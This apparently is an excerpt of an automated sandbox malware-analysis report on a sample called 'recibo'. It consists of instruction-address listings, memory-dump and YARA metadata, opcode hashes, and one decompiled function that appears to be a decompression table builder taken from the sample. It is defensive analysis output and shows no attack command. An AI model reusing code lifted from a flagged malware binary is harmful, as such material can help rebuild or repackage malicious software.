                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407238
                                                                                  0x00407238
                                                                                  0x0040723b
                                                                                  0x0040723e
                                                                                  0x00407241
                                                                                  0x00407243
                                                                                  0x00407245
                                                                                  0x00407248
                                                                                  0x0040724b
                                                                                  0x0040724b
                                                                                  0x0040724b
                                                                                  0x00407252
                                                                                  0x0040725a
                                                                                  0x0040725d
                                                                                  0x00407260
                                                                                  0x00407262
                                                                                  0x00407265
                                                                                  0x00407265
                                                                                  0x00407267
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407270
                                                                                  0x00407275
                                                                                  0x00407277
                                                                                  0x0040727d
                                                                                  0x0040727f
                                                                                  0x00407294
                                                                                  0x00407296
                                                                                  0x00407296
                                                                                  0x00407281
                                                                                  0x00407287
                                                                                  0x00407289
                                                                                  0x0040728b
                                                                                  0x0040728b
                                                                                  0x00407298
                                                                                  0x0040729c
                                                                                  0x0040729f
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x004072a8
                                                                                  0x004072a8
                                                                                  0x004072aa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004072b0
                                                                                  0x004072b0
                                                                                  0x004072b6
                                                                                  0x004072b8
                                                                                  0x004072dd
                                                                                  0x004072e0
                                                                                  0x004072e6
                                                                                  0x004072eb
                                                                                  0x004072f1
                                                                                  0x004072f7
                                                                                  0x004072f9
                                                                                  0x004072fc
                                                                                  0x00407305
                                                                                  0x0040730b
                                                                                  0x0040730b
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407302
                                                                                  0x0040730d
                                                                                  0x00407313
                                                                                  0x00407315
                                                                                  0x00407318
                                                                                  0x0040731a
                                                                                  0x00407320
                                                                                  0x00407322
                                                                                  0x00407324
                                                                                  0x00407326
                                                                                  0x00407328
                                                                                  0x0040732b
                                                                                  0x00407334
                                                                                  0x00407337
                                                                                  0x00407337
                                                                                  0x0040732d
                                                                                  0x0040732d
                                                                                  0x00407330
                                                                                  0x00407330
                                                                                  0x0040732b
                                                                                  0x00407322
                                                                                  0x00407339
                                                                                  0x0040733b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040733b
                                                                                  0x004072ba
                                                                                  0x004072ba
                                                                                  0x004072c0
                                                                                  0x004072c6
                                                                                  0x004072c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004072ca
                                                                                  0x004072ca
                                                                                  0x004072cc
                                                                                  0x004072ce
                                                                                  0x004072d7
                                                                                  0x004072d7
                                                                                  0x004072d0
                                                                                  0x004072d0
                                                                                  0x004072d3
                                                                                  0x004072d3
                                                                                  0x004072d9
                                                                                  0x004072db
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407341
                                                                                  0x00407341
                                                                                  0x00407346
                                                                                  0x00407348
                                                                                  0x00407349
                                                                                  0x0040734a
                                                                                  0x0040734b
                                                                                  0x00407351
                                                                                  0x00407354
                                                                                  0x00407357
                                                                                  0x0040735a
                                                                                  0x0040735c
                                                                                  0x00407362
                                                                                  0x00407362
                                                                                  0x00407365
                                                                                  0x00407365
                                                                                  0x00407365
                                                                                  0x00407365
                                                                                  0x0040736e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407373
                                                                                  0x00407373
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737b
                                                                                  0x00407412
                                                                                  0x00407412
                                                                                  0x00407415
                                                                                  0x00407417
                                                                                  0x00407418
                                                                                  0x00407419
                                                                                  0x0040741c
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x00407381
                                                                                  0x00407381
                                                                                  0x00407387
                                                                                  0x00407389
                                                                                  0x004073ae
                                                                                  0x004073b1
                                                                                  0x004073b7
                                                                                  0x004073bc
                                                                                  0x004073c2
                                                                                  0x004073c8
                                                                                  0x004073ca
                                                                                  0x004073cd
                                                                                  0x004073d6
                                                                                  0x004073dc
                                                                                  0x004073dc
                                                                                  0x004073cf
                                                                                  0x004073d1
                                                                                  0x004073d3
                                                                                  0x004073d3
                                                                                  0x004073de
                                                                                  0x004073e4
                                                                                  0x004073e6
                                                                                  0x004073e9
                                                                                  0x004073eb
                                                                                  0x004073f1
                                                                                  0x004073f3
                                                                                  0x004073f5
                                                                                  0x004073f7
                                                                                  0x004073f9
                                                                                  0x004073fc
                                                                                  0x00407405
                                                                                  0x00407408
                                                                                  0x00407408
                                                                                  0x004073fe
                                                                                  0x004073fe
                                                                                  0x00407401
                                                                                  0x00407401
                                                                                  0x004073fc
                                                                                  0x004073f3
                                                                                  0x0040740a
                                                                                  0x0040740c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040740c
                                                                                  0x0040738b
                                                                                  0x0040738b
                                                                                  0x00407391
                                                                                  0x00407397
                                                                                  0x00407399
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040739b
                                                                                  0x0040739b
                                                                                  0x0040739d
                                                                                  0x0040739f
                                                                                  0x004073a6
                                                                                  0x004073a6
                                                                                  0x004073a8
                                                                                  0x004073a1
                                                                                  0x004073a1
                                                                                  0x004073a3
                                                                                  0x004073a3
                                                                                  0x004073aa
                                                                                  0x004073ac
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407424
                                                                                  0x00407424
                                                                                  0x00407427
                                                                                  0x00407429
                                                                                  0x0040742c
                                                                                  0x0040742f
                                                                                  0x0040742f
                                                                                  0x0040742f
                                                                                  0x0040742f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406add
                                                                                  0x00406ac1
                                                                                  0x00000000
                                                                                  0x00406ac7
                                                                                  0x00406aca
                                                                                  0x00406ad4
                                                                                  0x00406ad7
                                                                                  0x00407002
                                                                                  0x00407005
                                                                                  0x00407007
                                                                                  0x00407008
                                                                                  0x0040700b
                                                                                  0x00407016
                                                                                  0x00407019
                                                                                  0x00407030
                                                                                  0x00407035
                                                                                  0x0040703c
                                                                                  0x00407041
                                                                                  0x00407045
                                                                                  0x00407047
                                                                                  0x00407047
                                                                                  0x00407047
                                                                                  0x0040704a
                                                                                  0x0040704c
                                                                                  0x00000000
                                                                                  0x00407052
                                                                                  0x00407052
                                                                                  0x00407056
                                                                                  0x00407061
                                                                                  0x00407074
                                                                                  0x00407079
                                                                                  0x0040707e
                                                                                  0x00407080
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407086
                                                                                  0x00407086
                                                                                  0x00407089
                                                                                  0x0040708b
                                                                                  0x00407099
                                                                                  0x00407099
                                                                                  0x0040709c
                                                                                  0x0040709c
                                                                                  0x0040709f
                                                                                  0x004070a2
                                                                                  0x004070a5
                                                                                  0x004070a8
                                                                                  0x004070ab
                                                                                  0x004070ae
                                                                                  0x00000000
                                                                                  0x004070ae
                                                                                  0x0040708d
                                                                                  0x0040708d
                                                                                  0x00407093
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407093
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407432
                                                                                  0x00407432
                                                                                  0x00407438
                                                                                  0x0040743e
                                                                                  0x00407443
                                                                                  0x00407449
                                                                                  0x0040744f
                                                                                  0x00407451
                                                                                  0x00407454
                                                                                  0x0040745d
                                                                                  0x00407463
                                                                                  0x00407463
                                                                                  0x00407456
                                                                                  0x00407458
                                                                                  0x0040745a
                                                                                  0x0040745a
                                                                                  0x00407465
                                                                                  0x00407467
                                                                                  0x0040746a
                                                                                  0x004074a5
                                                                                  0x004074a5
                                                                                  0x00000000
                                                                                  0x0040746c
                                                                                  0x0040746c
                                                                                  0x0040746c
                                                                                  0x00407472
                                                                                  0x00407475
                                                                                  0x00407477
                                                                                  0x004074ac
                                                                                  0x004074ae
                                                                                  0x00000000
                                                                                  0x004074ae
                                                                                  0x00000000
                                                                                  0x00407477
                                                                                  0x00000000
                                                                                  0x00406ab6
                                                                                  0x00407484
                                                                                  0x00000000
                                                                                  0x00407484
                                                                                  0x00406e98
                                                                                  0x00406e9a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e9c
                                                                                  0x00406e9c
                                                                                  0x00406e9f
                                                                                  0x00000000
                                                                                  0x00406e9f
                                                                                  0x00406de4
                                                                                  0x00406da5
                                                                                  0x00407489
                                                                                  0x0040748c
                                                                                  0x0040748e
                                                                                  0x00407497
                                                                                  0x0040749d
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                  • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                  • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                  • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 79e9516c95eecf4bf6f0541cf753394ddc62565a31d2195b29ab92ed68512d3e
                                                                                  • Instruction ID: 601d332e090b928a5418c98928e7a96d81114c0845f0fd20726a42344fd72899
                                                                                  • Opcode Fuzzy Hash: 79e9516c95eecf4bf6f0541cf753394ddc62565a31d2195b29ab92ed68512d3e
                                                                                  • Instruction Fuzzy Hash: 9581F145E3D30599EB933036C1753E71385CF172C1E66875BCC6BB2865B71B0A8E88C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: b8a78140ac20f2688f1fcb26d056ee847255726ee910f2af2c843af7a5ecf8c8
                                                                                  • Instruction ID: 7f9bb257a6694a35912ba73cd3568918db078c9509425c33060779fb8603a0e2
                                                                                  • Opcode Fuzzy Hash: b8a78140ac20f2688f1fcb26d056ee847255726ee910f2af2c843af7a5ecf8c8
                                                                                  • Instruction Fuzzy Hash: E1B18B71A403569FDF359E39C9A43EA77A3AF56390FB5803ECC899B104D3718A85CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf10cb2d479ba2b8f4d3ada516a85af6fb6e4c65f1c34ca0f6c20ff0cc0e9454
                                                                                  • Instruction ID: ec1a10ea1f3d438189aea7f8bb3f10ef15bc012aeb8440d6f88be42188a5f14b
                                                                                  • Opcode Fuzzy Hash: cf10cb2d479ba2b8f4d3ada516a85af6fb6e4c65f1c34ca0f6c20ff0cc0e9454
                                                                                  • Instruction Fuzzy Hash: 7271BF45E3D30A98EB53307685B53E71386CF132D1D66876BCC5B72865B71B0A8E88C7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 04fd2ebb63a2329f6a318fa634aac879fc8c8e55622499e6ab7b506ed5908afd
                                                                                  • Instruction ID: cc59ee2d5027f05b71e0d3e6dfed1071d636c01566783f7a60e560efa055828a
                                                                                  • Opcode Fuzzy Hash: 04fd2ebb63a2329f6a318fa634aac879fc8c8e55622499e6ab7b506ed5908afd
                                                                                  • Instruction Fuzzy Hash: FC810345E3D30599E753307685B53E71386CF131C1E66875BCC6B72865B70B0A8E84C7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0f6ddd57a9381dec213bbf00961f6a16c27ca37cffb78f5b8b91cabd3fbbf0e
                                                                                  • Instruction ID: 7f8c335ad2898545fcc791d35cb297a38804dc4b26c5238ea6f5e8c850825f6e
                                                                                  • Opcode Fuzzy Hash: b0f6ddd57a9381dec213bbf00961f6a16c27ca37cffb78f5b8b91cabd3fbbf0e
                                                                                  • Instruction Fuzzy Hash: C481C045E3D30998EB93307681B53E71786CF172C1E66876BCC5B72865B71B0A8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                  				signed int _v8;
                                                                                  				unsigned int _v12;
                                                                                  				signed int _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				intOrPtr* _v32;
                                                                                  				signed int* _v36;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				intOrPtr _v48;
                                                                                  				intOrPtr _v52;
                                                                                  				void _v116;
                                                                                  				signed int _v176;
                                                                                  				signed int _v180;
                                                                                  				signed int _v240;
                                                                                  				signed int _t166;
                                                                                  				signed int _t168;
                                                                                  				intOrPtr _t175;
                                                                                  				signed int _t181;
                                                                                  				void* _t182;
                                                                                  				intOrPtr _t183;
                                                                                  				signed int* _t184;
                                                                                  				signed int _t186;
                                                                                  				signed int _t187;
                                                                                  				signed int* _t189;
                                                                                  				signed int _t190;
                                                                                  				intOrPtr* _t191;
                                                                                  				intOrPtr _t192;
                                                                                  				signed int _t193;
                                                                                  				signed int _t195;
                                                                                  				signed int _t200;
                                                                                  				signed int _t205;
                                                                                  				void* _t207;
                                                                                  				short _t208;
                                                                                  				signed char _t222;
                                                                                  				signed int _t224;
                                                                                  				signed int _t225;
                                                                                  				signed int* _t232;
                                                                                  				signed int _t233;
                                                                                  				signed int _t234;
                                                                                  				void* _t235;
                                                                                  				signed int _t236;
                                                                                  				signed int _t244;
                                                                                  				signed int _t246;
                                                                                  				signed int _t251;
                                                                                  				signed int _t254;
                                                                                  				signed int _t256;
                                                                                  				signed int _t259;
                                                                                  				signed int _t262;
                                                                                  				void* _t263;
                                                                                  				void* _t264;
                                                                                  				signed int _t267;
                                                                                  				intOrPtr _t269;
                                                                                  				intOrPtr _t271;
                                                                                  				signed int _t274;
                                                                                  				intOrPtr* _t275;
                                                                                  				unsigned int _t276;
                                                                                  				void* _t277;
                                                                                  				signed int _t278;
                                                                                  				intOrPtr* _t279;
                                                                                  				signed int _t281;
                                                                                  				intOrPtr _t282;
                                                                                  				intOrPtr _t283;
                                                                                  				signed int* _t284;
                                                                                  				signed int _t286;
                                                                                  				signed int _t287;
                                                                                  				signed int _t288;
                                                                                  				signed int _t296;
                                                                                  				signed int* _t297;
                                                                                  				intOrPtr _t298;
                                                                                  				void* _t299;
                                                                                  
                                                                                  				_t278 = _a8;
                                                                                  				_t187 = 0x10;
                                                                                  				memset( &_v116, 0, _t187 << 2);
                                                                                  				_t189 = _a4;
                                                                                  				_t233 = _t278;
                                                                                  				do {
                                                                                  					_t166 =  *_t189;
                                                                                  					_t189 =  &(_t189[1]);
                                                                                  					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                  					_t233 = _t233 - 1;
                                                                                  				} while (_t233 != 0);
                                                                                  				if(_v116 != _t278) {
                                                                                  					_t279 = _a28;
                                                                                  					_t267 =  *_t279;
                                                                                  					_t190 = 1;
                                                                                  					_a28 = _t267;
                                                                                  					_t234 = 0xf;
                                                                                  					while(1) {
                                                                                  						_t168 = 0;
                                                                                  						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_t190 = _t190 + 1;
                                                                                  						if(_t190 <= _t234) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					_v8 = _t190;
                                                                                  					if(_t267 < _t190) {
                                                                                  						_a28 = _t190;
                                                                                  					}
                                                                                  					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                  						_t234 = _t234 - 1;
                                                                                  						if(_t234 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					_v28 = _t234;
                                                                                  					if(_a28 > _t234) {
                                                                                  						_a28 = _t234;
                                                                                  					}
                                                                                  					 *_t279 = _a28;
                                                                                  					_t181 = 1 << _t190;
                                                                                  					while(_t190 < _t234) {
                                                                                  						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                  						if(_t182 < 0) {
                                                                                  							L64:
                                                                                  							return _t168 | 0xffffffff;
                                                                                  						}
                                                                                  						_t190 = _t190 + 1;
                                                                                  						_t181 = _t182 + _t182;
                                                                                  					}
                                                                                  					_t281 = _t234 << 2;
                                                                                  					_t191 = _t299 + _t281 - 0x70;
                                                                                  					_t269 =  *_t191;
                                                                                  					_t183 = _t181 - _t269;
                                                                                  					_v52 = _t183;
                                                                                  					if(_t183 < 0) {
                                                                                  						goto L64;
                                                                                  					}
                                                                                  					_v176 = _t168;
                                                                                  					 *_t191 = _t269 + _t183;
                                                                                  					_t192 = 0;
                                                                                  					_t235 = _t234 - 1;
                                                                                  					if(_t235 == 0) {
                                                                                  						L21:
                                                                                  						_t184 = _a4;
                                                                                  						_t271 = 0;
                                                                                  						do {
                                                                                  							_t193 =  *_t184;
                                                                                  							_t184 =  &(_t184[1]);
                                                                                  							if(_t193 != _t168) {
                                                                                  								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                  								_t236 =  *_t232;
                                                                                  								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                                  								 *_t232 = _t236 + 1;
                                                                                  							}
                                                                                  							_t271 = _t271 + 1;
                                                                                  						} while (_t271 < _a8);
                                                                                  						_v16 = _v16 | 0xffffffff;
                                                                                  						_v40 = _v40 & 0x00000000;
                                                                                  						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                  						_t195 = _v8;
                                                                                  						_t186 =  ~_a28;
                                                                                  						_v12 = _t168;
                                                                                  						_v180 = _t168;
                                                                                  						_v36 = 0x432190;
                                                                                  						_v240 = _t168;
                                                                                  						if(_t195 > _v28) {
                                                                                  							L62:
                                                                                  							_t168 = 0;
                                                                                  							if(_v52 == 0 || _v28 == 1) {
                                                                                  								return _t168;
                                                                                  							} else {
                                                                                  								goto L64;
                                                                                  							}
                                                                                  						}
                                                                                  						_v44 = _t195 - 1;
                                                                                  						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                  						do {
                                                                                  							_t282 =  *_v32;
                                                                                  							if(_t282 == 0) {
                                                                                  								goto L61;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								_t283 = _t282 - 1;
                                                                                  								_t200 = _a28 + _t186;
                                                                                  								_v48 = _t283;
                                                                                  								_v24 = _t200;
                                                                                  								if(_v8 <= _t200) {
                                                                                  									goto L45;
                                                                                  								}
                                                                                  								L31:
                                                                                  								_v20 = _t283 + 1;
                                                                                  								do {
                                                                                  									_v16 = _v16 + 1;
                                                                                  									_t296 = _v28 - _v24;
                                                                                  									if(_t296 > _a28) {
                                                                                  										_t296 = _a28;
                                                                                  									}
                                                                                  									_t222 = _v8 - _v24;
                                                                                  									_t254 = 1 << _t222;
                                                                                  									if(1 <= _v20) {
                                                                                  										L40:
                                                                                  										_t256 =  *_a36;
                                                                                  										_t168 = 1 << _t222;
                                                                                  										_v40 = 1;
                                                                                  										_t274 = _t256 + 1;
                                                                                  										if(_t274 > 0x5a0) {
                                                                                  											goto L64;
                                                                                  										}
                                                                                  									} else {
                                                                                  										_t275 = _v32;
                                                                                  										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                  										if(_t222 >= _t296) {
                                                                                  											goto L40;
                                                                                  										}
                                                                                  										while(1) {
                                                                                  											_t222 = _t222 + 1;
                                                                                  											if(_t222 >= _t296) {
                                                                                  												goto L40;
                                                                                  											}
                                                                                  											_t275 = _t275 + 4;
                                                                                  											_t264 = _t263 + _t263;
                                                                                  											_t175 =  *_t275;
                                                                                  											if(_t264 <= _t175) {
                                                                                  												goto L40;
                                                                                  											}
                                                                                  											_t263 = _t264 - _t175;
                                                                                  										}
                                                                                  										goto L40;
                                                                                  									}
                                                                                  									_t168 = _a32 + _t256 * 4;
                                                                                  									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                  									 *_a36 = _t274;
                                                                                  									_t259 = _v16;
                                                                                  									 *_t297 = _t168;
                                                                                  									if(_t259 == 0) {
                                                                                  										 *_a24 = _t168;
                                                                                  									} else {
                                                                                  										_t276 = _v12;
                                                                                  										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                  										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                  										_a5 = _a28;
                                                                                  										_a4 = _t222;
                                                                                  										_t262 = _t276 >> _t186;
                                                                                  										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                  										 *(_t298 + _t262 * 4) = _a4;
                                                                                  									}
                                                                                  									_t224 = _v24;
                                                                                  									_t186 = _t224;
                                                                                  									_t225 = _t224 + _a28;
                                                                                  									_v24 = _t225;
                                                                                  								} while (_v8 > _t225);
                                                                                  								L45:
                                                                                  								_t284 = _v36;
                                                                                  								_a5 = _v8 - _t186;
                                                                                  								if(_t284 < 0x432190 + _a8 * 4) {
                                                                                  									_t205 =  *_t284;
                                                                                  									if(_t205 >= _a12) {
                                                                                  										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                  										_v36 =  &(_v36[1]);
                                                                                  										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                  										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                  									} else {
                                                                                  										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                  										_t208 =  *_t284;
                                                                                  										_v36 =  &(_t284[1]);
                                                                                  									}
                                                                                  									_a6 = _t208;
                                                                                  								} else {
                                                                                  									_a4 = 0xc0;
                                                                                  								}
                                                                                  								_t286 = 1 << _v8 - _t186;
                                                                                  								_t244 = _v12 >> _t186;
                                                                                  								while(_t244 < _v40) {
                                                                                  									 *(_t168 + _t244 * 4) = _a4;
                                                                                  									_t244 = _t244 + _t286;
                                                                                  								}
                                                                                  								_t287 = _v12;
                                                                                  								_t246 = 1 << _v44;
                                                                                  								while((_t287 & _t246) != 0) {
                                                                                  									_t287 = _t287 ^ _t246;
                                                                                  									_t246 = _t246 >> 1;
                                                                                  								}
                                                                                  								_t288 = _t287 ^ _t246;
                                                                                  								_v20 = 1;
                                                                                  								_v12 = _t288;
                                                                                  								_t251 = _v16;
                                                                                  								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                  									L60:
                                                                                  									if(_v48 != 0) {
                                                                                  										_t282 = _v48;
                                                                                  										_t283 = _t282 - 1;
                                                                                  										_t200 = _a28 + _t186;
                                                                                  										_v48 = _t283;
                                                                                  										_v24 = _t200;
                                                                                  										if(_v8 <= _t200) {
                                                                                  											goto L45;
                                                                                  										}
                                                                                  										goto L31;
                                                                                  									}
                                                                                  									break;
                                                                                  								} else {
                                                                                  									goto L58;
                                                                                  								}
                                                                                  								do {
                                                                                  									L58:
                                                                                  									_t186 = _t186 - _a28;
                                                                                  									_t251 = _t251 - 1;
                                                                                  								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                  								_v16 = _t251;
                                                                                  								goto L60;
                                                                                  							}
                                                                                  							L61:
                                                                                  							_v8 = _v8 + 1;
                                                                                  							_v32 = _v32 + 4;
                                                                                  							_v44 = _v44 + 1;
                                                                                  						} while (_v8 <= _v28);
                                                                                  						goto L62;
                                                                                  					}
                                                                                  					_t277 = 0;
                                                                                  					do {
                                                                                  						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                  						_t277 = _t277 + 4;
                                                                                  						_t235 = _t235 - 1;
                                                                                  						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                  					} while (_t235 != 0);
                                                                                  					goto L21;
                                                                                  				}
                                                                                  				 *_a24 =  *_a24 & 0x00000000;
                                                                                  				 *_a28 =  *_a28 & 0x00000000;
                                                                                  				return 0;
                                                                                  			}











































































                                                                                  0x00000000
                                                                                  0x0040760d
                                                                                  0x00407613
                                                                                  0x00407615
                                                                                  0x00407617
                                                                                  0x00407618
                                                                                  0x0040762d
                                                                                  0x0040762d
                                                                                  0x00407630
                                                                                  0x00407632
                                                                                  0x00407632
                                                                                  0x00407634
                                                                                  0x00407639
                                                                                  0x0040763b
                                                                                  0x00407642
                                                                                  0x00407644
                                                                                  0x0040764c
                                                                                  0x0040764c
                                                                                  0x0040764e
                                                                                  0x0040764f
                                                                                  0x0040765e
                                                                                  0x00407662
                                                                                  0x00407666
                                                                                  0x00407669
                                                                                  0x0040766c
                                                                                  0x00407671
                                                                                  0x00407674
                                                                                  0x0040767a
                                                                                  0x00407681
                                                                                  0x00407687
                                                                                  0x00407880
                                                                                  0x00407880
                                                                                  0x00407885
                                                                                  0x00407894
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407885
                                                                                  0x00407694
                                                                                  0x00407697
                                                                                  0x0040769a
                                                                                  0x0040769d
                                                                                  0x004076a1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076ac
                                                                                  0x004076af
                                                                                  0x004076b0
                                                                                  0x004076b2
                                                                                  0x004076b8
                                                                                  0x004076bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076c1
                                                                                  0x004076c2
                                                                                  0x004076c5
                                                                                  0x004076c8
                                                                                  0x004076cb
                                                                                  0x004076d1
                                                                                  0x004076d3
                                                                                  0x004076d3
                                                                                  0x004076db
                                                                                  0x004076df
                                                                                  0x004076e4
                                                                                  0x00407709
                                                                                  0x0040770f
                                                                                  0x00407711
                                                                                  0x00407713
                                                                                  0x00407716
                                                                                  0x0040771f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076e6
                                                                                  0x004076e6
                                                                                  0x004076ef
                                                                                  0x004076f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407704
                                                                                  0x00407704
                                                                                  0x00407707
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076f7
